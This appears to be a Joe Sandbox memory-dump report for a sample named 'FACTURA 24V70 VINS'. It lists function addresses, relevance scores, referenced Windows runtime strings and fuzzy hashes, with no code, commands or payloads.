Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: @$MUI
API String ID: 0-17815947
Opcode ID: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
Instruction ID: 23551c9b215801fbeae07a0cb64ec8dda8d517525edec183ace09fc6dfbf1917
Opcode Fuzzy Hash: 6e62c20c18bfe6788a6f69959ccca86f420b5c5da5e85db6eab7d574e6f2055b
Instruction Fuzzy Hash: 82511671E0021DAEDF11DFA9CC84AEEFBB9EB44754F100529EA12A7691D7309A45CB60

Function 017304E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0173063D
kLsE, xrefs: 01730540

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
Instruction ID: 925d3c4258a1115b4f2cac76fa5e6e016425c75406ea8fc8e4ba842335c61ab0
Opcode Fuzzy Hash: 9194c7220f2c715bd620de85860a49d66fd70cf6d00794c449dc2370aca40808
Instruction Fuzzy Hash: D9518D71504742CFD725DF68C544AA7FBE4AFC4304F20883EFAAA87286E7709545CB92

Function 0173A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0173A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0173A2FB

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
Instruction ID: 9ad592bc23bf515a950679db2fe9e1d2eaad9921acba566e08de4a9dcceaf8f8
Opcode Fuzzy Hash: 2961fee78710ec4f6b442b983a91facbf4368796d0c458d95690eed551b022d5
Instruction Fuzzy Hash: E341DF30A04659EBDB12DF59D885BAEFBF4FF84700F2440A9E944DB2A2E3B5D940CB40

Function 017B07C3 Relevance: 2.6, Strings: 2, Instructions: 114COMMON

Download Yara Rule

Strings

B=:)(, xrefs: 017B07DF, 017B081F
B=:), xrefs: 017B085A, 017B0894

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: B=:)$B=:)(
API String ID: 0-215191734
Opcode ID: 1313209cf0f9b83813d467422f0a85ac5184e13c5e6a2bad0975a6ef1dcff95c
Instruction ID: b315732ab7e4fdc2d1ddbd4db880fd11d816bcee7e2c07ad3729901d91aca5ce
Opcode Fuzzy Hash: 1313209cf0f9b83813d467422f0a85ac5184e13c5e6a2bad0975a6ef1dcff95c
Instruction Fuzzy Hash: 0C4180B25043019FD721DF29C885B9BFBE8FF88654F108A2EF998D7255D7709A04CB92

Function 0176A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 0176A5E9
Cleanup Group, xrefs: 0176A5E4

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
Instruction ID: 94d41e256acf1e9f9d52e64fe8c22cc2f5bb97c94cfcb3b8883115cab71ff924
Opcode Fuzzy Hash: e8660e0640eeb34ce4fcc688838d023b2d39fdf112347bb5a337e8be003d47c4
Instruction Fuzzy Hash: 1E01DCB2250740AFD322DF24CD49B26B7E8EB84B25F018939AA58D7190E334E908CB46

Function 0173C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 0173C8C3, 0173CA40

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
Instruction ID: 98e2bc9877f4157735fba3fe4603c05c2519842918f8e03eb5a55f7c98dfa7a6
Opcode Fuzzy Hash: 8bde832d3124899d8f827d4b9ce860dfe92d2d2cd1ef45ab9ae92c0f262c9c89
Instruction Fuzzy Hash: 9F827C75E002198FEB25CFA9C884BEDFBB5BF88710F14816AE959AB352D7309D41CB50

Function 017B6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 017B65C1

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
Instruction ID: 942240f5964a0452fd7ccb9bb6818450776fa06c6d4d50ba8c45dfdc091eb0b8
Opcode Fuzzy Hash: 113d4a2981c32de9849bc781cee997c74d795d33cb72ee5497a50c1c5f7bc3b6
Instruction Fuzzy Hash: 5A913F72941219ABEB21DF95CD85FEEBBB8EF18B50F104065F700AB195D774AD04CBA0

Function 017DE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON

Download Yara Rule

Strings

, xrefs: 017DE1FA

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5e79269e68db5268452013829e9125aae4bf38d28ab90950f0b3d8d533c7197a
Instruction ID: 579935b48517fdfd5a111b931667b8c75318285529d44f2d30c3bb5e3c0aac9c
Opcode Fuzzy Hash: 5e79269e68db5268452013829e9125aae4bf38d28ab90950f0b3d8d533c7197a
Instruction Fuzzy Hash: 9E918E31A00609ABDB23AFA5DC88FAFFB79EF45750F100029F505AB250EF75A901DB91

Function 0176A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON

Download Yara Rule

Strings

GlobalTags, xrefs: 017A67C9

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: GlobalTags
API String ID: 0-1106856819
Opcode ID: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
Instruction ID: 665d713f20599f96e972237f07e1443a89caf70a62e6af5de185d90970532102
Opcode Fuzzy Hash: a3d8d5d5756939a59cfd8eaec647d25f88b803cfa28ecf9864ea4fb24a4a95d2
Instruction Fuzzy Hash: 1E717DB5E0021ACFDF29CF9CC590AADFBB5BF88710F58826AF905A7245E7319941CB50

Function 017D4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON

Download Yara Rule

Strings

.mui, xrefs: 017D4A7F

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: .mui
API String ID: 0-1199573805
Opcode ID: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
Instruction ID: a8701577e8ff937f3d86d846a4dc3bb80392304b95da049739231a5725e2672d
Opcode Fuzzy Hash: a176b7c2b2ce7ac7cac99c1bbee013052980787071c44e337fc876ca2239bc2d
Instruction Fuzzy Hash: 1251B072D0022E9BDF11DF99C844AAEFBB4AF58A40F05416AEA12BB654D7348D01CFE5

Function 0174E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON

Download Yara Rule

Strings

EXT-, xrefs: 0174E6A4

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: EXT-
API String ID: 0-1948896318
Opcode ID: 43691f55e92c828fd48ab055d9d7d6db24bd9b1ce542f0b78f600f66831a005e
Instruction ID: 0e951e7a80d8fd499501ddbcedfa983ec852557af33c88c05e9ae6665bfda8e7
Opcode Fuzzy Hash: 43691f55e92c828fd48ab055d9d7d6db24bd9b1ce542f0b78f600f66831a005e
Instruction Fuzzy Hash: 3F4160725083129BD712DB79C884B6BF7D8BF88724F44096DF684D7180EB78D904C796

Function 017AC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

BinaryHash, xrefs: 017AC77F

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
Instruction ID: 261303606a7ea779116a457aadbd4d6e4a2e21837db19edacb768875f5fe2dc3
Opcode Fuzzy Hash: 1ac719cfb79e52d52f37821250bc5fdb4f7242cea298057c6704217816931208
Instruction Fuzzy Hash: BA4142B1D4112DAADF22DB50CC84FDEF77CAB44724F4046A5EB18AB144DB709E898FA4

Function 017C6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

#, xrefs: 017C6B91

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
Instruction ID: 5aea71e3ab0ceede9b28aae0797e0be0c0c445a83b513b4a927168ba590fb352
Opcode Fuzzy Hash: aea5ae35cd8c6de1448e2d00764fb17fe4a3be0add2e5846b203fd20dce003e7
Instruction Fuzzy Hash: 8831E531A006199BEB32DF69C894BEEFBA8DF05B04F14406CF951AB382D775E905CB50

Function 017ACA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 017ACAA2

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
Instruction ID: 6abd71c51b76ae5f4d8a649d0693ea794fa8b57bbf2cfca12c060473c0ba101f
Opcode Fuzzy Hash: 5e9fd23d939ee0d2690a42bc5caf7d91e886ec5d216678d11ec3c88e15b1c075
Instruction Fuzzy Hash: 07310336900519BFEB16DB58C855EBFFB74EBC0720F414269AA15AB250D7319E00EBE0

Function 017B892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 017B895E

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
Instruction ID: a135b3295bc0dc0815c63719655cd4f293c75b9d6a13664355e7d068826dcb57
Opcode Fuzzy Hash: 8e5acaa86775fb618eeadd03925d3d3546774a8fbec4fd02e72ab1d526e44683
Instruction Fuzzy Hash: 9501F7712402219BEB325E59C8C8BE6FB69EF82794B04001DF7814A155CB20A881CB93

Function 017D2000 Relevance: .8, Instructions: 757COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
Instruction ID: 933612857a54bab6abedf9cf276b4ef744cdf47fb5c2cc379f091f905bda20ea
Opcode Fuzzy Hash: 24f2d03c8bbf73275ea39cf4687256d1e031739f28e054620fc31f9765eed83f
Instruction Fuzzy Hash: 6942E2326083499FD725CF68C891A6BFBF5BF88300F08492DFA9697252D771D846CB52

Function 017C8158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
Instruction ID: 7c2d4208465756154ffba641a623bc35bb6bc098b5a735504c9b35fafb055755
Opcode Fuzzy Hash: c9174d14a469ad3d3ed48350a9e67d06d3d317c07cd54a7c365d4841cc2bb5ee
Instruction Fuzzy Hash: 0D425C75A002199FEB25CF69C881BADFBF5BF48700F18819DE949EB242D7349981CF51

Function 01742840 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
Instruction ID: 66589c169c8727a77f82b721fc62b30e085d59e9649f6ec9bcd76af6eb6b88f4
Opcode Fuzzy Hash: e5e766ebfddd0a1534338ee0207437e50cd48f452edaa7da3e2d7dfc5c11ecc4
Instruction Fuzzy Hash: F932DE70A007558BEF25CF69D848BBEFBF2BF84304F24421DE5869B285D735A949CB90

Function 017DA118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
Instruction ID: dadd1cba5cd9cda1057b21abe9409ff4e1e65967dff9250845d7b9a5c47c31a1
Opcode Fuzzy Hash: 549d65f22a02044a1985e64a04e14181249f77c8eb7b668ab6333b4c5ee16210
Instruction Fuzzy Hash: 7122CD70204669CBEB25CF2DC094772FBF1BF44300F18849AE9968F286E775E592CB61

Function 01736A50 Relevance: .5, Instructions: 548COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
Instruction ID: 09fc6ce793976412a8862f138d6b48b43557d3484786f28b51246b7e2cf195cf
Opcode Fuzzy Hash: 186ccf1a6d91dd0cf48b0e53a8f456a705665e57688e81da2478aa8ce23e0f71
Instruction Fuzzy Hash: 0132AD71A04205DFDB25CF68D880BAAFBF1FF88310F2485A9E955AB392D730E955CB50

Function 01754A35 Relevance: .4, Instructions: 423COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction ID: 11197c980730d2b751b00dd656881e645f8f4769a2f60e2f12b7dee701890515
Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
Instruction Fuzzy Hash: 63F16F71E0021A9BDF55CFA9D584BAEFBF5AF48710F048169ED06AB344E7B4D881CB50

Function 017C892B Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
Instruction ID: 5954953d70328224d2e1d7e7338d3eb90d1b690e208bafc1b7672f095ebf36b6
Opcode Fuzzy Hash: e6fe770e43500436b7e8e1c6c2788561f72e05e20e75e724ba645ca5b7ae0f55
Instruction Fuzzy Hash: C6D1F071A0061A9BDF15CF68C841BFEF7F1AF88B04F1881AED955A7241E735EA01CB61

Function 017365D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
Instruction ID: 2c1cd8610147619a6a187d9a0a7e2ad03f0f7378f30f14f90252e35bee38b990
Opcode Fuzzy Hash: 37a044da7f0c6a1b5206bf75f25ad43d1a31374cba0f675be01eef452c0d78bd
Instruction Fuzzy Hash: ABE16971608342DFC715CF28C094A6AFBE0BF89314F55896DF99987352EB31EA05CB92

Function 01728397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
Instruction ID: a357379d289031f00c828a804af09275a0fee60b74d20b2201f5473b7246aa27
Opcode Fuzzy Hash: 3033275775d94159b1d8db0df20ca384b60dd5c8d236175385579ab813142733
Instruction Fuzzy Hash: C4D12471B402268BCB14DF69C880ABAF7F1FF54308F14422DE912DB281E735EA52CB61

Function 017B8243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 878f6c99cafdf162594425a73908b1746ce8101904812e4e2c01fbb9bb1503d4
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: E3B17C75A00609AFDB24DF99C984BEBFBBDBF84304F10446DAA02A7794DB34E945CB11

Function 01740535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: b54d83913c0acdba1eca3e0ba1e4110fc76c8042d8964e759db2cf53cc5f2b70
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: DFB1F731600646AFDF26DB68C954BBEFBF6EF48300F280199E65697285D730ED45CB90

Function 017383C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f454243e4709e9aa8eea7a1ea73605b77856405a27a68f7c556ca17f366341
Instruction ID: f5f0f5709d011c1327660fe17c4a1da357a19effd7f4617dca3eea148ee47973
Opcode Fuzzy Hash: 07f454243e4709e9aa8eea7a1ea73605b77856405a27a68f7c556ca17f366341
Instruction Fuzzy Hash: 9BC137741083818FEB64CF19C494BAAF7E5BF88304F544A6DE98987391D774EA48CF92

Function 0172C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a78c86c36fa352a6bc5ed8541deed80f9aa7014c28c12b10138a4f120d6f38f3
Instruction ID: 1a890e10d7ae7b868d79a466dcc314bfde5ebadfa0e67887fac1ad249cf27dbd
Opcode Fuzzy Hash: a78c86c36fa352a6bc5ed8541deed80f9aa7014c28c12b10138a4f120d6f38f3
Instruction Fuzzy Hash: 00B17070A002668BDB75DF69C880BADF7B1EF54700F2485EAD50AE7245EB70DD86CB21

Function 0175E5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
Instruction ID: 22200c4d9c7d91badbc864b7f3649d3894927b63049db704fb01ac2018285f50
Opcode Fuzzy Hash: fa940caca15313f236dcba695bbd30dda6a3ecf92a2793fb859b1978b48c84f4
Instruction Fuzzy Hash: 0CA13531E00659AFEF22DF58D848BAEFFB4EB01754F144161EE50AB291DBB49E44CB90

Function 01770185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
Instruction ID: 87ad28ca5e0b3cf6bfdf7157e9486b6137bd61ff950508f0d2ca4edf1088d241
Opcode Fuzzy Hash: 4bc23c606a3d059d7f039a67c3dd80c3a322e503a007e49fecdfc210562323ab
Instruction Fuzzy Hash: FBA1AE71B0061ADBDF25CF69C990BAAF7F1FF56318F104129EA4597282EB34E911CB90

Function 01804500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
Instruction ID: 7111ecdb8ca8ce08bd7056a6b660a96df40f2d6ec77fe1cdf2d86f4ac66976ca
Opcode Fuzzy Hash: 53cd26e53e7d16ab0b39d359e75da08a52af6bb856c459e38d8e9c091abbd565
Instruction Fuzzy Hash: EAA1CC72A406169FD762DF18CD84B2ABBE9FF48304F154928F689DB691D334EE00CB91

Function 01802B57 Relevance: .3, Instructions: 266COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction ID: 0f71fd3faf15c8bfd992ba4acf92db8cba8a34039a172bea1f32ab5a1972ce85
Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
Instruction Fuzzy Hash: B3B13871E0061EDFDF66CFA9C884AADB7B6BF48310F148129E914E7295D770AE41CB90

Function 017B60E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
Instruction ID: a523a6030ad6e77bb762f385853046e46b91744d8c496acee737b97bb2a75b22
Opcode Fuzzy Hash: e2b7c6e8bf27dbc3934245016117a1ec0730b1876f22cd47ee730bccd7004173
Instruction Fuzzy Hash: B4919E71E0521AAFDB15CFA8D8C4BEEFBB5AB48710F154169FB11AB241D734E9009BA0

Function 0174E3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
Instruction ID: f1d7da1cae80a02c6168199de121c01864480c26f902bfd81bea54c289e5e5cb
Opcode Fuzzy Hash: 12ad3a59a1b3e1e4a44f3ee12de71ac19b78669f6fd18194f071d9f6d0cb86ee
Instruction Fuzzy Hash: 67911331A00612CBEB25DB6CD884B79FBA1FF94724F2540A9EE059B345FB38D941CB91

Function 01786ACC Relevance: .2, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3038189203.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1700000_FACTURA 24V70 VINS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
Instruction ID: f0b0d61c88f7dded8689e59ab2b5869ff542fa272a84544cbd8ebe0852cd2d1a
Opcode Fuzzy Hash: cb371ad99f037dd2403354b882bd701922bf6b6662b00ef64b1b685b24de08ba
Instruction Fuzzy Hash: 38818071A00616ABDB25DFA9C840ABEFBF9FB48700F14852EF555E7640E734E940CBA4

